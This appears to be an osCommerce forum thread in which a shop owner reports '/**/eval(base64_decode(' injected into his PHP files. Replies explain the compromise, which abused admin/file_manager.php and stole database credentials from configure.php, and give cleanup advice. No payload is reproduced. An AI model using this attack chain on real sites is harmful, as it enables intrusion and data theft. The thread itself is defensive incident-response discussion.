/**/eval(base64_decode(

[Guest]

Hi All

 

While doing some work on my php files I have noticed some code at the top that was not there before and starts with this /**/eval(base64_decode(not sure what it is but I do no my file permissions are right and don't suspect a hack.

 

I have not pasted all the encrypted code.

 

any one have any suggestions.

 

Many Thanks

 

Liam

[BryceJr]

Click ->here.

[JR Sales Company]

You have been hit by an automated hack that has been affecting open source applications.

View your source code on any .php file, and you will see URLs inplanted at the top of your pages, probably for advertising a site called forex.com, ferdax.com, etc. The hacker exploits admin vulnerabilities by bypassing your login and using admin/file_manager.php to edit and infect *all* of your .php files, and upload his own, including his back door entry. They will also steal your admin password info, and database/ftp passwords on the way out by looking in your configure.php files. Check your files folders and look for files that should'nt be there, like strange .php files in the images folders, etc.

 

If you have your website and database backed up, I would recommend deleting all server files and your database, and re-upload them from your backups That will solve the current compromise. Other solutions are available in the threads below.

 

It is caused by vulnerabilities in admin/file_manager.php, admin/define_languages.php, and from not having proper .htaccess protection in the admin directory. Read the threads below on how to secure your site.

 

See threads:

 

http://www.oscommerce.com/forums/topic/344272-did-someone-hack-my-site-eval-base64-decode/page__hl__hacked

 

http://www.oscommerce.com/forums/index.php?showtopic=313323

 

Your not alone, a bunch of us got hit.

[Xpajun]

..... They will also steal your admin password info, and database/ftp passwords on the way out by looking in your configure.php files. .....

 

 

Are you sure this is not a tiny bit over dramatic?

 

 

 

Admin passwords (as are your customer passwords) are encrypted, access to the database is controlled by .htaccess by your host (at least in my case)

 

Although what you say may be possible the reason for this injected hack is to send your new customer email details to various spammers

[JR Sales Company]

Are you sure this is not a tiny bit over dramatic?

 

 

 

Admin passwords (as are your customer passwords) are encrypted, access to the database is controlled by .htaccess by your host (at least in my case)

 

Although what you say may be possible the reason for this injected hack is to send your new customer email details to various spammers

 

I don't feel that sharing a fact is dramatic. Configure.php lists the database host server, id, and password. The id and password are the db login, at least in GoDaddy's case. You can, with that info, go directly to the db server, and login to the SQL server.

The admin and customer accounts are stored in the database, and wouldn't very hard to extract for someone who knows what they are doing, encrypted or not.

 

I mean no alarm, I only report on what has happened in my case:

 

Server log shows:

1. The exploit of file_manager.php.

2. Configure.php downloaded.

3. GoDaddy reports MySql Admin CP logged into right after.

 

And, they got around the .htaccess login for the admin folder, spyware or something.

 

With all that action, I believe there may have been a live person working along.

 

No trying to tell anyone to panic. Just things that may have happened. :D

 

If I wanted to incite drama and panic, I would simply say "OH...MY....GOD!!!!!! YOUR WEBSITE WAS HACKED!!!! OMG OMG OMG OMGOMGOMGOMGOMGOMGOMGOMOMG!!!!!!!!" :)

[spooks]

Are you sure this is not a tiny bit over dramatic?

 

 

Jason is perfectly correct, I suggest you read the topics on this v nasty hack, once 'in' the hacker has full control over your site, the uploaded tool even gives him direct access to the dBase!!

 

 

You should never by complacent about security, its a pity its taken smthg like this to wake some up to that fact.

[FIMBLE]

This is one of the worst i have seen, anyone who still

a ) has the filemanager.php in the admin folder

b ) has the admin still named as admin

is open to this, its not a case of if, it when and it will be bad.

 

If you have been subject to the attack the sure way of getting rid of is to delete the whole site, not just osC but if you have forums etc.. any php file will be infected. delete the databases and restore the whole lot from a point in time before the hack took place.

obviously you are going to need to change your logins too.

and check that no additional accounts in your SQL have been created.

it may be a step too far, but i have deleted accounts from servers and recreated them to ensure all has gone.

Problem is with a lot of users, they do not know until its already too late and have no idea about security, if its password protected then its safe ... not so.

 

Nic

[Guest]

Thanks to everyone that has replied I thought as much will follow the advice from the links provided and will now have to delete the site and start again as my server backups are only kept for three days oh well I will at least have something to do over the next Two days

 

Regards

 

Liam